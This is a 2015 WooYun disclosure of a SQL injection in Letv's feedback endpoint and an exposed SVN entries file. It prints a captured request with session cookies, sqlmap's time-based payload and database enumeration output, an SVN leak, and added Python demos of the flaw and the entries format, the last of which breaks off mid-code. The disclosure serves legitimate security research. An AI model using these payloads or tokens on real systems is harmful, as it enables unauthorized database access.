Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0116457

Title: Letv vulnerability gift pack: SQL injection in one spot + SVN leak

Vendor: 乐视网 (Letv)

Author: 小老大

Submitted: 2015-05-27 12:15

Fixed: 2015-07-11 17:32

Published: 2015-07-11 17:32

Type: SQL injection

Severity: High

Self-rated Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-05-27: details sent to the vendor, awaiting vendor handling
2015-05-27: vendor confirmed, details disclosed to the vendor only
2015-06-06: details disclosed to core white hats and domain experts
2015-06-16: details disclosed to regular white hats
2015-06-26: details disclosed to intern white hats
2015-07-11: details disclosed to the public

Brief description:

Letv is good! Let me show some support too!

Detailed description:

I looked around and found something new; clicking about, videos sometimes wouldn't open, so I submitted feedback and captured the request:

POST /vplay/feedback.php HTTP/1.1
Host: stat.letv.com
Proxy-Connection: keep-alive
Content-Length: 8870
Origin: http://player.hz.letv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://player.hz.letv.com/hzplayer.swf/v_list=2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ark_uuid=9be6a217f30f42f7af8a2981e69e0bbc; vjuids=7affbae17.14cb2993a04.0.ffa42a0b; tj_UID=14289280243188785837; pgv_pvi=1159026688;
_jzqa=1.1026984752248182100.1429000360.1429000360.1430185940.2; _jzqx=1.1429000360.1430185940.2.jzqsr=shop%2Eletv%2Ecom|jzqct=/.jzqsr=hao
%2E360%2Ecn|jzqct=/; __xsptplus104=104.5.1430287198.1430287198.1%232%7Cbzclk.baidu.com%7C%7C%7C
%25E4%25B9%2590%25E8%25A7%2586%25E8%25B6%2585%25E7%25BA%25A7%25E6%2589%258B%25E6%259C%25BA%7C%23%23ILK8lugFyLuxqfM1sRAk_K6gppNdDuK8%23;
stat_num=0; m=qq_A954E6209D8A038E304DE8E19F44ADEA; sso_tk=1020c209deEm3R7RMarotbF3Ru0gyWLECYhg9Cs1JCKOOwVQy02m2qUim1m3LCOplMUM9XkEvN;
sso_nickname=user33363198; casflag=1; ssouid=33363198; sso_picture=http%3A%2F%2Fi1.letvimg.com%2Fuser%2F201403%2F22%2F532cf8d20841f1680.jpg;
sso_icon=http%3A%2F%2Fi2.letvimg.com%2Fuser%2F201403%2F22%2F532cf8d1e3f924509.jpg%2Chttp%3A%2F%2Fi2.letvimg.com%2Fuser
%2F201403%2F22%2F532cf8d1f2fb56278.jpg%2Chttp%3A%2F%2Fi1.letvimg.com%2Fuser%2F201403%2F22%2F532cf8d20841f1680.jpg%2Chttp%3A%2F
%2Fi0.letvimg.com%2Fuser%2F201403%2F22%2F532cf8d21eb749619.jpg; utype=3; lfrom=my;
u=eyJ1aWQiOiIzMzM2MzE5OCIsIm5pY2tuYW1lIjoicXFfQTk1NEU2MjA5RDhBMDM4RTMwNERFOEUxOUY0NEFERUEiLCJlbWFpbCI6IiIsIm5hbWUiOiJxcV9BOTU0RTYyMDlEOEEwMzhF
MzA0REU4RTE5RjQ0QURFQSIsInNzb3VpZCI6IjMzMzYzMTk4In0%3D; ui=9f7681nEubgBiJJGDK7moePMO%2FF0vgqL%2BXc9UvSW9WZ3sVsXpRo90GKEYURv7vgrBA8xXYJohXbAA
%2BulrGeE7%2FrDEa2AiVmEiG9KvI69eCOLw%2Bke83jlQk96LHcBsid5%2BFbT%2Br6l1pXwtW4NpELzklg
%2BpJDHoDZbyzJuJNpMZDBkWnInkLXt2R86SqfEk4FpjcRHLmiiw9U1ZBoVx%2F4btQuS5xIYUnyfGXBygA; muv=2882877681.1431451552.3020117ca6;
ALLYESID4=A6Ni/1rUJNwDA7JH; narrow=1; tj_lc=F2A8F1B08E555518F03387C9F8A8CFBA73155B97; tj_clickcount=20; his_vid=2092585-21126856-21127435-
21126530-21126321-21125641-21125295-21119655-21139218-21136231; vjlast=1428925529.1432150832.11; mlta=%7B%22mltn%22%3A%7B%226082%22%3A%5B
%224730246136456383104%3E1%3E1432155973383%3E1%3E1432155973383%3E4613147526633669933%3E1432155973383%22%2C1447707973226%5D%7D%2C%22mlti%22%3A
%7B%226082%22%3A%5B%22143215597308687432%22%2C1447707973086%5D%7D%2C%22mlts%22%3A%7B%226082%22%3A%5B%225%22%2C1447707973226%5D%7D%2C
%22mltmapping%22%3A%7B%220%22%3A%5B1%2C1434747973226%5D%7D%7D; tj_uuid=14326963744265630327; MixCook=tk_checked-1; newVideo=%7B
%221%22%3A13%2C%222%22%3A69%2C%223%22%3A221%2C%224%22%3A471%2C%225%22%3A95%2C%228%22%3A0%2C%229%22%3A24%2C%2211%22%3A139%2C%2214%22%3A7%2C
%2216%22%3A3%2C%2217%22%3A0%2C%2219%22%3A0%2C%2220%22%3A13%2C%2222%22%3A157%2C%2223%22%3A61%2C%2230%22%3A5581%2C%2232%22%3A0%2C
%2233%22%3A0%2C%2234%22%3A6%2C%2235%22%3A0%2C%2236%22%3A1%2C%2238%22%3A0%7D; baidu_session=baidu
phone=13311111111&email=&data=mmsid%3Dnull%26vid%3D%26typeFrom%3Dlepai%26version%3DLETV%5F3%2E3%2E4%26ref%3Dhttp%253A%252F%252Fwww%2Ebaidu
%2Ecom%252Fs%253Fwd%253Dsite%25253Astarcast%2Eletv%2Ecom%2526pn%253D60%2526oq%253Dsite%25253Astarcast%2Eletv%2Ecom%2526ie%253Dutf%2D8%2526rsv
%5Fpq%253Dd3e85ee400003853%2526rsv%5Ft%253D5e16Ao2yye%25252Fx%25252B43O06ROmf5aZSw%25252BtJfun%25252BntVU%25252Bgb%25252FoCklWZKXWcNvLpnxo
%26errno%3D555&errno=555&log=%3C%21DOCTYPE%20html%20PUBLIC%20%27%2D%2F%2FW3C%2F%2FDTD%20XHTML%201%2E0%20Transitional%2F%2FEN%27%20%27http%3A
%2F%2Fwww%2Ew3%2Eorg%2FTR%2Fxhtml1%2FDTD%2Fxhtml1%2Dtransitional%2Edtd%27%3E%3Chtml%20xmlns%3D%27http%3A%2F%2Fwww%2Ew3%2Eorg%2F1999%2Fxhtml
%27%3E%3Chead%3E%3Cmeta%20http%2Dequiv%3D%27Content%2DType%27%20content%3D%27text%2Fhtml%3B%20charset%3Dutf%2D8%27%2F%3E%3Ctitle%3EArthropod
%20Log%3C%2Ftitle%3E%3Cstyle%20type%3D%27text%2Fcss%27%3Ebody%20%7Bbackground%3A%20%23151515%3Bfont%2Dfamily%3A%20Verdana%2C%20Arial%2C
%20Helvetica%2C%20sans%2Dserif%3Bfont%2Dsize%3A%2015px%3Bcolor%3A%20%23fefefe%3B%7D%23main%2Dcontainer%7Bmargin%3A%2010px%3Bclear%3A%20both
%3B%7D%23container%7Bbackground%3A%20%23252525%3Bborder%3A%201px%20solid%20%23000%3Bpadding%3A%2020px%3B%7D%23header%20%7Bfont%2Dfamily%3A
%20%27Trebuchet%20MS%27%2C%20Verdana%2C%20Arial%2C%20Helvetica%2C%20sans%2Dserif%3Bfont%2Dsize%3A%2025px%3Bfont%2Dweight%3A%20bold%3Bcolor%3A
%20%23fefefe%3Bheight%3A%2085px%3Bpadding%3A%2010px%3B%7D%3C%2Fstyle%3E%3C%2Fhead%3E%3Cbody%3E%3Cdiv%20id%3D%27main%2Dcontainer%27%3E%3Cdiv
%20id%3D%27header%27%3ELetv%20Log%28%E4%B9%90%E8%A7%86%E6%92%AD%E6%94%BE%E5%99%A8%E6%97%A5%E5%BF%97%29%3Cbr%20%2F%3E%20Date
%3A2015%2D5%2D27%2011%3A41%3A47%20%3C%2Fdiv%3E%3Cdiv%20id%3D%27container%27%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue
%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B0%202015%2D5%2D27%2011%3A32%3A4%20info%5D%20Load%20Config%20Len%200%3C%2Fspan%3E%3C
%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe
%27%20%3E%5B1%202015%2D5%2D27%2011%3A32%3A4%20info%5D%20Load%20Config%20Complete%20None%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E
%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B2%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20%5Bobject%20PluginProxy%5D%20onWholeComplete%20Length%202%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E
%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B3%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20System%3A%20win7%20%7C%20chrome%20%7C%20WIN%2011%2C6%2C602%2C180%20%7C%20LETV
%5F3%2E3%2E4%5F20150423%20Kernel%5F20150423%20APS%5F2%2E7%2E2%5F20150526%20%7C%20http%3A%2F%2Fstarcast%2Eletv%2Ecom%2Fplay%2F4650%3C%2Fspan
%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A
%23fefefe%27%20%3E%5B4%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20KernelP2PPlugins%3A%20http%3A%2F%2Fplayer%2Eletvcdn%2Ecom%2Fp
%2F201401%2F20%2Fnewplayer%2F01200947%2FFPLetvPlayer%2Eswf%0Ahttp%3A%2F%2Fplayer%2Eletvcdn%2Ecom%2Flc01%5Fp
%2F201505%2F21%2F18%2F40%2F21%2F21%2Fnewplayer%2F1%2FMPLetvPlayer%2Eswf%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D
%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B5%202015%2D5%2D27%2011%3A32%3A5%20info
%5D%20%5BStat%5D%20http%3A%2F%2Fdc%2Eletv%2Ecom%2Fenv%2F%3Fp1%3D1%26p2%3D10%26p3%3D%2D%26lc%3DF2A8F1B08E555518F03387C9F8A8CFBA73155B97%26uuid
%3DC0F48B29496BEF9ECEF5C939604709C87B0A3D0D%26ip%3D%2D%26mac%3D%2D%26nt%3D%2D%26os%3Dwin7%26osv%3D%2D%26app%3DWIN%2011%2C6%2C602%2C180%26bd
%3D%2D%26xh%3D%2D%26ro%3D1280%5F800%26br%3Dchrome%26r%3D0%2E17611282598227262%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv
%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B6%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20Kernel%2EsetConfig%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item
%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B7%202015%2D5%2D27%2011%3A32%3A5%20info%5D
%20%5Bobject%20AdMediator%5D%20videoRect%EF%BC%9A%20%28x%3D0%2C%20y%3D61%2E05%2C%20w%3D488%2C%20h%3D366%2E9%29%3C%2Fspan%3E%3C%2Fdiv%3E%3C
%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B8%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20Kernel%2EsetAuth%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item
%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B9%202015%2D5%2D27%2011%3A32%3A5%20warn%5D
%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item
%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B10%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20%5BUser%20Data%5D
%2033363198%20qq%5FA954E6209D8A038E304DE8E19F44ADEA%20user33363198%20null%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D
%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B11%202015%2D5%2D27%2011%3A32%3A5%20error
%5D%20%5Bobject%20AuthController%5D%20onTransferFailednull%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E
%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B12%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel
%2EonAuthInvalid%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E
%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B13%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan%3E%3C
%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe
%27%20%3E%5B14%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20%5BStat%5D%20http%3A%2F%2Fdc%2Eletv%2Ecom%2Fpl%2F%3Fver%3D2%2E0%26ac%3Dinit%26err
%3D555%26ut%3D%2D%26ap%3D1%26p1%3D1%26p2%3D10%26p3%3D%2D%26lc%3DF2A8F1B08E555518F03387C9F8A8CFBA73155B97%26uid%3D33363198%26uuid
%3DE529933A7EABB6137FB58F5939CB095F96B3ED6B%26auid%3D%2D%26cid%3Dnull%26pid%3Dnull%26vid%3D%26vlen%3D0%26ch%3Dlepai%26ty%3D0%26url%3Dhttp
%253A%252F%252Fstarcast%2Eletv%2Ecom%252Fplay%252F4650%26ref%3Dhttp%253A%252F%252Fwww%2Ebaidu%2Ecom%252Fs%253Fwd%253Dsite%25253Astarcast
%2Eletv%2Ecom%2526pn%253D60%2526oq%253Dsite%25253Astarcast%2Eletv%2Ecom%2526ie%253Dutf%2D8%2526rsv%5Fpq%253Dd3e85ee400003853%2526rsv%5Ft
%253D5e16Ao2yye%25252Fx%25252B43O06ROmf5aZSw%25252BtJfun%25252BntVU%25252Bgb%25252FoCklWZKXWcNvLpnxo%26pv%3DCode%253AAlex%5FLETV
%5F4%2E2%2E3%26st%3D%2D%26ilu%3D0%26pcode%3D%2D%26pt%3D0%26weid%3D14326975239758692503%26vt%3D%2D%26prg%3D0%26py%3Dadload%253D1%26r
%3D0%2E1470045349560678%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue
%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B15%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan
%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A
%23fefefe%27%20%3E%5B16%202015%2D5%2D27%2011%3A32%3A5%20fault%5D%20SDK%20Fault%20errorInKernel%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr
%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B17%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv
%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B18%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv
%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B19%202015%2D5%2D27%2011%3A32%3A5%20fault%5D%20%5Bobject%20SystemWarnMediator%5D%20Fault%20errorInSdk%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E
%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B20%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3C%2Fdiv%3E
%3C%2Fdiv%3EAuthor%20%3A%20LinYang%20%E5%BE%AE%E5%8D%9A%3A%3Ca%20href%3D%27http%3A%2F%2Fweibo%2Ecom%2Fopensourceplatform%27%20target%3D
%27%5Fblank%27%3EAdobe%E6%B4%8B%E4%BB%94%3C%2Fa%3E%3C%2Fbody%3E%3C%2Fhtml%3E&content=%E8%A7%86%E9%A2%91%E5%8D%A1%E9%A1%BF%2D123123&mail=null


Saved the request and ran sqlmap on it; proof:

QQ截图20150527120225.png


QQ截图20150527120310.png


Several parameters in this request are probably injectable; for lack of time I didn't run them, please test them yourselves!

Proof of vulnerability:

QQ截图20150527120325.png


[root@Hacker~]# Sqlmap Sqlmap -r E:\6.txt --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's respo
[*] starting at 11:42:57
[11:42:57] [INFO] parsing HTTP request from 'E:\6.txt'
[11:42:57] [INFO] testing connection to the target URL
[11:42:57] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:42:59] [INFO] target URL is stable
[11:42:59] [INFO] testing if POST parameter 'phone' is dynamic
[11:42:59] [WARNING] POST parameter 'phone' does not appear dynamic
[11:42:59] [WARNING] heuristic (basic) test shows that POST parameter 'phone' might not be injectable
[11:42:59] [INFO] testing for SQL injection on POST parameter 'phone'
[11:42:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:43:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:43:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:43:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:43:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:43:06] [INFO] testing 'MySQL inline queries'
[11:43:06] [INFO] testing 'PostgreSQL inline queries'
[11:43:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:43:07] [INFO] testing 'Oracle inline queries'
[11:43:07] [INFO] testing 'SQLite inline queries'
[11:43:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:43:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:43:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:43:10] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:43:22] [INFO] POST parameter 'phone' is 'MySQL > 5.0.11 AND time-based blind' injectable
[11:43:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:43:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (pote
[11:43:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:43:30] [INFO] checking if the injection point on POST parameter 'phone' is a false positive
POST parameter 'phone' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 106 HTTP(s) requests:
---
Place: POST
Parameter: phone
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: phone=13311111111' AND SLEEP(5) AND 'Cqxc'='Cqxc&email=&data=mmsid=null%26vid=%26typeFrom=lepai%26version=LETV_3.3
http://player.letvcdn.com/lc01_p/201505/21/18/40/21/21/newplayer/1/MPLetvPlayer.swf</span></div></div><br /><div class='item'><
---
[11:44:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[11:44:24] [INFO] fetching database names
[11:44:24] [INFO] fetching number of databases
[11:44:24] [INFO] retrieved:
[11:44:24] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
2
[11:44:38] [INFO] retrieved:
[11:44:43] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[11:46:25] [INFO] retrieved: vplay
available databases [2]:
[*] information_schema
[*] vplay
[11:46:56] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1
[11:46:56] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\stat.letv.com'
[*] shutting down at 11:46:56
[root@Hacker~]# Sqlmap Sqlmap -r E:\6.txt -D vplay --count --threads 10
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's respo
[*] starting at 11:50:03
[11:50:03] [INFO] parsing HTTP request from 'E:\6.txt'
[11:50:03] [INFO] resuming back-end DBMS 'mysql'
[11:50:03] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: phone
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: phone=13311111111' AND SLEEP(5) AND 'Cqxc'='Cqxc&email=&data=mmsid=null%26vid=%26typeFrom=lepai%26version=LETV_3.3
http://player.letvcdn.com/lc01_p/201505/21/18/40/21/21/newplayer/1/MPLetvPlayer.swf</span></div></div><br /><div class='item'><
---
[11:50:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[11:50:03] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system dat
[11:50:03] [INFO] fetching tables for database: 'vplay'
[11:50:03] [INFO] fetching number of tables for database 'vplay'
[11:50:03] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:50:03] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[11:50:06] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[11:50:25] [INFO] adjusting time delay to 1 second due to good response times
5
[11:50:27] [ERROR] invalid character detected. retrying..
[11:50:27] [WARNING] increasing time delay to 2 seconds
[11:50:28] [INFO] retrieved: feedback
[11:51:36] [INFO] retrieved: n
[11:51:56] [ERROR] invalid character detected. retrying..
[11:51:56] [WARNING] increasing time delay to 3 seconds
ew_video
[11:53:59] [ERROR] invalid character detected. retrying..
[11:53:59] [WARNING] increasing time delay to 4 seconds
_day_views
[11:56:58] [INFO] retrieved:
[11:57:14] [ERROR] invalid character detected. retrying..
[11:57:14] [WARNING] increasing time delay to 5 seconds
p
[11:58:20] [ERROR] invalid character detected. retrying..
[11:58:20] [WARNING] increasing time delay to 6 seconds
layer_time
[12:02:28] [INFO] retrieved: s
[12:03:29] [ERROR] unable to properly validate last character value ('t')..
t
[12:03:37] [ERROR] invalid character detected. retrying..
[12:03:37] [WARNING] increasing time delay to 2 seconds
ar_sc
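An added example (mine, not code from the report or from Letv) of why the 'phone' parameter of feedback.php answered sqlmap's time-based payload: a handler that splices the form value into the INSERT hands the payload to the database as SQL, so SLEEP(5) is evaluated as an expression and the response is delayed, while a parameterized INSERT stores the same string as data. Assumptions: a three-column feedback table matching the form fields, and an in-memory SQLite database standing in for the MySQL backend, with a Python function registered under the name SLEEP so the MySQL-only payload can be run unchanged and its evaluation observed.

```python
import sqlite3
import time

# The exact payload sqlmap reported for the 'phone' parameter above.
SQLMAP_PAYLOAD = "13311111111' AND SLEEP(5) AND 'Cqxc'='Cqxc"


class FeedbackStore:
    """Stand-in for the MySQL-backed /vplay/feedback.php handler (assumed schema)."""

    def __init__(self, sleep_scale=0.01):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute(
            "CREATE TABLE feedback (phone TEXT, email TEXT, content TEXT)")
        self.sleep_calls = 0

        # SQLite has no SLEEP(); register one that behaves like MySQL's
        # (returns 0) but counts its calls and sleeps a scaled-down time,
        # so the time-based oracle is observable without a 5 s wait.
        def fake_sleep(seconds):
            self.sleep_calls += 1
            time.sleep(seconds * sleep_scale)
            return 0

        self.conn.create_function("SLEEP", 1, fake_sleep)

    def save_vulnerable(self, phone, email, content):
        """Builds the INSERT by string formatting: the user's value becomes
        part of the SQL text, so its quote closes the literal and the rest
        is parsed and executed as an expression."""
        sql = ("INSERT INTO feedback (phone, email, content) "
               "VALUES ('%s', '%s', '%s')" % (phone, email, content))
        self.conn.execute(sql)
        self.conn.commit()

    def save_fixed(self, phone, email, content):
        """Parameterized INSERT: values travel separately from the statement,
        so the payload is stored verbatim and nothing in it is evaluated."""
        self.conn.execute(
            "INSERT INTO feedback (phone, email, content) VALUES (?, ?, ?)",
            (phone, email, content))
        self.conn.commit()

    def phones(self):
        return [row[0] for row in self.conn.execute("SELECT phone FROM feedback")]


def probe(handler_name, payload=SQLMAP_PAYLOAD):
    """Send the payload through one handler and report what the database did:
    whether SLEEP() ran, how long the call took, and what was stored."""
    store = FeedbackStore()
    handler = getattr(store, handler_name)
    start = time.monotonic()
    handler(payload, "", "video stutter-123123")   # constructed form values
    elapsed = time.monotonic() - start
    return {
        "sleep_calls": store.sleep_calls,
        "elapsed": elapsed,
        "stored_phone": store.phones()[0],
    }


if __name__ == "__main__":
    for name in ("save_vulnerable", "save_fixed"):
        r = probe(name)
        print("%-16s SLEEP() called %d time(s), %.3fs, stored phone=%r"
              % (name, r["sleep_calls"], r["elapsed"], r["stored_phone"]))
```

The vulnerable path stores the evaluated expression (not the phone number the user typed) and pays the sleep; the fixed path stores the payload as a literal and never calls SLEEP, which is exactly the difference sqlmap's time-based test measures.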


SVN leak:
http://starcast.letv.com/.svn/entries

10
dir
79465
http://svn2.letv.cn/tp/front-end-tv/tag/lepai.letv.com/pc/20150119/php/Html/Admin
http://svn2.letv.cn
2015-05-20T06:46:03.612937Z
79464
xielijiao
svn:special svn:externals svn:needs-lock
21433022-bb36-4ff6-a907-2c018ad81495
favicon.ico
file
2015-05-20T06:48:22.000000Z
6950488799a0ff598be6fd5d0cc5f928
2015-02-11T02:35:09.702296Z
60246
liliangliang
has-props
4286
index.php
file
2015-05-20T06:48:22.000000Z
939428b2e5c56814d7470d58474a8f64
2015-01-15T11:24:20.809322Z
54319
liliangliang
1109
js
dir
res
dir
style
dir
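An added example (mine, not from the report) of what an exposed pre-1.7 .svn/entries file hands an attacker. The listing above has lost its blank lines, so the sample below is reconstructed from its visible values placed at the field positions of the format-10 layout; the assumptions are the field order used by Subversion 1.4-1.6 working copies (formats 8-10) and that the web server also serves .svn/text-base/, where those versions keep the pristine copy of every versioned file (so index.php source would be fetchable as index.php.svn-base).

```python
# Field order of one record in a Subversion 1.4-1.6 working copy .svn/entries
# file (formats 8-10): one field per line, blank line = unset, a record stops
# after its last set field and is terminated by a line holding only "\f".
FIELDS = [
    "name", "kind", "revision", "url", "repos", "schedule", "text_time",
    "checksum", "committed_date", "committed_rev", "last_author", "has_props",
    "has_prop_mods", "cachable_props", "present_props", "conflict_prev",
    "conflict_new", "conflict_wrk", "prop_reject_file", "copied",
    "copyfrom_url", "copyfrom_rev", "deleted", "absent", "incomplete", "uuid",
    "lock_token", "lock_owner", "lock_comment", "lock_creation_date",
    "changelist", "keep_local", "working_size", "depth", "tree_conflict_data",
    "file_external",
]


def _record(**fields):
    """Lay out one entries record (used only to build the sample below)."""
    slots = [""] * len(FIELDS)
    for name, value in fields.items():
        slots[FIELDS.index(name)] = value
    while slots and slots[-1] == "":
        slots.pop()
    return "\n".join(slots) + "\n\f\n"


# Constructed from the values visible in the leaked file above, with the
# blank lines restored at the positions the format prescribes.
SAMPLE_ENTRIES = "10\n" + "".join([
    _record(name="", kind="dir", revision="79465",
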